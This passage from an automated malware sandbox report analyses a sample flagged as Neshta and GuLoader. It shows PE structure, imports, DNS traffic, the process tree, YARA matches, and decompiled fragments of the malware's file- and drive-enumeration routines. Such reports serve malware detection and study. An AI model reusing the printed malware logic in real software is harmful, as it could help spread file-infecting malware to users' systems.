                                                          mov eax, 004091C0h
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h
                                                          call 00007F8CE0E25719h
                                                          mov eax, 004091DCh
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h
                                                          call 00007F8CE0E25705h
                                                          mov eax, dword ptr [00409210h]
                                                          mov ecx, 0000000Bh
                                                          mov edx, 0000000Bh
                                                          call 00007F8CE0E256F1h
                                                          call 00007F8CE0E25748h
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007F8CE0E23032h
                                                          mov eax, dword ptr [ebp-14h]
                                                          call 00007F8CE0E235C6h
                                                          cmp eax, 0000A200h
                                                          jle 00007F8CE0E267E7h
                                                          call 00007F8CE0E25CC6h
                                                          call 00007F8CE0E264D9h
                                                          mov eax, 004091C4h
                                                          mov ecx, 00000003h
                                                          mov edx, 00000003h

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x150000x864.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1400.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x5cc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x170000x18.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          CODE0x10000x722c0x7400False0.617355872845data6.51167217489IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          DATA0x90000x2180x400False0.3623046875data3.15169834056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          BSS0xa0000xa8990x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .idata0x150000x8640xa00False0.37421875data4.17385976895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .tls0x160000x80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rdata0x170000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                          .reloc0x180000x5cc0x600False0.848307291667data6.44309346589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                          .rsrc0x190000x14000x1400False0.1548828125data2.05936459375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x191500x10a8dataRussianRussia
                                                          RT_RCDATA0x1a1f80x10data
                                                          RT_RCDATA0x1a2080xacdata
                                                          RT_GROUP_ICON0x1a2b40x14dataRussianRussia

                                                          Imports

                                                          DLLImport
                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                          user32.dllGetKeyboardType, MessageBoxA
                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                          oleaut32.dllSysFreeString, SysReAllocStringLen
                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                          advapi32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                          kernel32.dllWriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                                          gdi32.dllStretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                          user32.dllReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                          shell32.dllShellExecuteA, ExtractIconA

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          RussianRussia

                                                          Network Behavior

                                                          Network Port Distribution

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 26, 2021 16:53:26.899549961 CEST5309753192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:53:26.918117046 CEST53530978.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:53:50.560745955 CEST5315753192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:53:50.577361107 CEST53531578.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:53:58.080331087 CEST4925753192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:53:58.093720913 CEST53492578.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:54:09.598524094 CEST6238953192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:54:09.632157087 CEST53623898.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:54:18.438185930 CEST4991053192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:54:18.457828045 CEST53499108.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:54:50.401195049 CEST5585453192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:54:50.414465904 CEST53558548.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:54:57.578154087 CEST6454953192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:54:57.595695019 CEST53645498.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:55:07.227267981 CEST6315353192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:55:07.247842073 CEST53631538.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:55:50.137828112 CEST5299153192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:55:50.151462078 CEST53529918.8.8.8192.168.2.4
                                                          Sep 26, 2021 16:55:51.290071011 CEST5370053192.168.2.48.8.8.8
                                                          Sep 26, 2021 16:55:51.303760052 CEST53537008.8.8.8192.168.2.4

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Sep 26, 2021 16:53:50.577361107 CEST8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)

                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: Z68mMCAxFZ.exe PID: 6284 Parent PID: 5448

                                                          General

                                                          Start time:16:53:31
                                                          Start date:26/09/2021
                                                          Path:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\Z68mMCAxFZ.exe'
                                                          Imagebase:0x400000
                                                          File size:115200 bytes
                                                          MD5 hash:547612A9FF746063A74C71B009230500
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: Z68mMCAxFZ.exe PID: 6584 Parent PID: 6284

                                                          General

                                                          Start time:16:53:33
                                                          Start date:26/09/2021
                                                          Path:C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                                                          Imagebase:0x400000
                                                          File size:73728 bytes
                                                          MD5 hash:6CE7CC1F376F6BD9D090EAF04EF72DFE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Visual Basic
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: Z68mMCAxFZ.exe PID: 4488 Parent PID: 6584

                                                          General

                                                          Start time:16:55:34
                                                          Start date:26/09/2021
                                                          Path:C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
                                                          Wow64 process (32bit):
                                                          Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe'
                                                          Imagebase:
                                                          File size:73728 bytes
                                                          MD5 hash:6CE7CC1F376F6BD9D090EAF04EF72DFE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: Z68mMCAxFZ.exe PID: 6284 Parent PID: 5448 Z68mMCAxFZ.exeCOMMON

                                                            Executed Functions

                                                            Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84);
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}

























                                                            0x00405634
                                                            0x00405634
                                                            0x00405634
                                                            0x00405639
                                                            0x0040563b
                                                            0x0040563c
                                                            0x00405646
                                                            0x00405649
                                                            0x0040564a
                                                            0x0040564b
                                                            0x0040564e
                                                            0x00405653
                                                            0x00405659
                                                            0x0040565f
                                                            0x00405660
                                                            0x00405665
                                                            0x0040566a
                                                            0x0040566f
                                                            0x00405671
                                                            0x00405676
                                                            0x00405679
                                                            0x0040567a
                                                            0x0040567c
                                                            0x0040567c
                                                            0x00405682
                                                            0x00405689
                                                            0x0040568a
                                                            0x0040568c
                                                            0x0040568c
                                                            0x00405694
                                                            0x00405694
                                                            0x004056a9
                                                            0x004056aa
                                                            0x004056b2
                                                            0x004056b3
                                                            0x004056b7
                                                            0x004056c3
                                                            0x004056c5
                                                            0x004056ca
                                                            0x004056cf
                                                            0x004056d2
                                                            0x004056d5
                                                            0x004056da
                                                            0x004056df
                                                            0x004056e0
                                                            0x004056e5
                                                            0x004056e7
                                                            0x004056e9
                                                            0x004056fc
                                                            0x00405701
                                                            0x0040570f
                                                            0x00405713
                                                            0x00405715
                                                            0x00405722
                                                            0x00405727
                                                            0x0040572c
                                                            0x0040572d
                                                            0x00405730
                                                            0x00405730
                                                            0x00405737
                                                            0x0040573c
                                                            0x00405741
                                                            0x00405741
                                                            0x00405746
                                                            0x0040574e
                                                            0x00405759

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                            • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                            • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 3541575487-438819550
                                                            • Opcode ID: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                            • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                            • Opcode Fuzzy Hash: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                            • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405080, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				struct _WIN32_FIND_DATAA _v336;
				char _v340;
				char _v344;
				signed int _t50;
				signed int _t51;
				int _t53;
				intOrPtr* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t99;

				_v344 = 0;
				_v340 = 0;
				_v16 = 0;
				_t76 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004033FC(_v8);
				E004033FC(_v12);
				_push(_t99);
				_push(0x4051db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t99 + 0xfffffeac;
				E00403094(__ecx);
				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
					E00403214( &_v8, 0x4051f0);
				}
				if(_v12 != 0 &&  *_v12 == 0x5c) {
					E00404728(_v12,  &_v340, 2);
					E0040312C( &_v12, _v340);
				}
				E00403258( &_v16, _v12, _v8);
				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
				_t96 = _t50;
				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
				while(_t51 != 0) {
					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
						if( *_t76 != 0) {
							E00403214(_t76, E004051FC);
						}
						_push( *_t76);
						_push(_v8);
						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
						_push(_v344);
						E004032CC();
					}
					_t53 = FindNextFileA(_t96,  &_v336); // executed
					asm("sbb eax, eax");
					_t51 = _t53 + 1;
				}
				FindClose(_t96); // executed
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E004051E2);
				E004030B8( &_v344, 2);
				return E004030B8( &_v16, 3);
			}
















                                                            0x0040508d
                                                            0x00405093
                                                            0x00405099
                                                            0x0040509c
                                                            0x0040509e
                                                            0x004050a1
                                                            0x004050a7
                                                            0x004050af
                                                            0x004050b6
                                                            0x004050b7
                                                            0x004050bc
                                                            0x004050bf
                                                            0x004050c4
                                                            0x004050cd
                                                            0x004050e9
                                                            0x004050e9
                                                            0x004050f2
                                                            0x0040510a
                                                            0x00405118
                                                            0x00405118
                                                            0x00405126
                                                            0x0040513b
                                                            0x00405140
                                                            0x00405144
                                                            0x004051a6
                                                            0x00405153
                                                            0x00405158
                                                            0x00405161
                                                            0x00405161
                                                            0x00405166
                                                            0x00405168
                                                            0x0040517c
                                                            0x00405181
                                                            0x0040518e
                                                            0x0040518e
                                                            0x0040519b
                                                            0x004051a3
                                                            0x004051a5
                                                            0x004051a5
                                                            0x004051ab
                                                            0x004051b2
                                                            0x004051b5
                                                            0x004051b8
                                                            0x004051c8
                                                            0x004051da

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                            • Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
                                                            • Opcode Fuzzy Hash: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                            • Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 55%
                                                            			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62);
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}















                                                            0x004056a7
                                                            0x004056a7
                                                            0x004056a7
                                                            0x004056a9
                                                            0x004056aa
                                                            0x004056b2
                                                            0x004056b3
                                                            0x004056b7
                                                            0x004056c3
                                                            0x004056c5
                                                            0x004056ca
                                                            0x004056cf
                                                            0x004056d2
                                                            0x004056d5
                                                            0x004056da
                                                            0x004056df
                                                            0x004056e0
                                                            0x004056e5
                                                            0x004056e7
                                                            0x004056e9
                                                            0x004056fc
                                                            0x00405701
                                                            0x0040570f
                                                            0x00405713
                                                            0x00405715
                                                            0x00405722
                                                            0x00405727
                                                            0x0040572c
                                                            0x0040572d
                                                            0x00405730
                                                            0x00405730
                                                            0x00405737
                                                            0x0040573c
                                                            0x00405741
                                                            0x00405741
                                                            0x0040574e
                                                            0x00405759

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                            • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                            • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                            • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                            • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                            • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406D40, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
				char _v155;
				char _v160;
				signed int _t37;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;

				_t50 = _t51;
				_v160 = 0;
				_t45 = __eax;
				_push(_t50);
				_push(0x406dfc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xffffff64;
				GetLogicalDriveStringsA(0x97,  &_v155); // executed
				_t37 = 0;
				while(_a12245929 != 0) {
					_t48 = _t37 & 0x000000ff;
					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
						E004031B4();
						E00403214(_t45, _v160);
					}
					_t37 = _t37 + 4;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00406E03);
				return E00403094( &_v160);
			}










                                                            0x00406d41
                                                            0x00406d4e
                                                            0x00406d54
                                                            0x00406d58
                                                            0x00406d59
                                                            0x00406d5e
                                                            0x00406d61
                                                            0x00406d70
                                                            0x00406d75
                                                            0x00406dd5
                                                            0x00406d7b
                                                            0x00406d91
                                                            0x00406dc0
                                                            0x00406dcd
                                                            0x00406dcd
                                                            0x00406dd2
                                                            0x00406dd2
                                                            0x00406de5
                                                            0x00406de8
                                                            0x00406deb
                                                            0x00406dfb

                                                            APIs
                                                            • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                            • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Drive$LogicalStringsType
                                                            • String ID:
                                                            • API String ID: 1630765265-0
                                                            • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                            • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                            • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                            • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}







                                                            0x00404f74
                                                            0x00404f79
                                                            0x00404f7a
                                                            0x00404f7e
                                                            0x00000000
                                                            0x00404f83
                                                            0x00404f8d

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                            • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                            • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                            • Opcode Fuzzy Hash: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                            • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
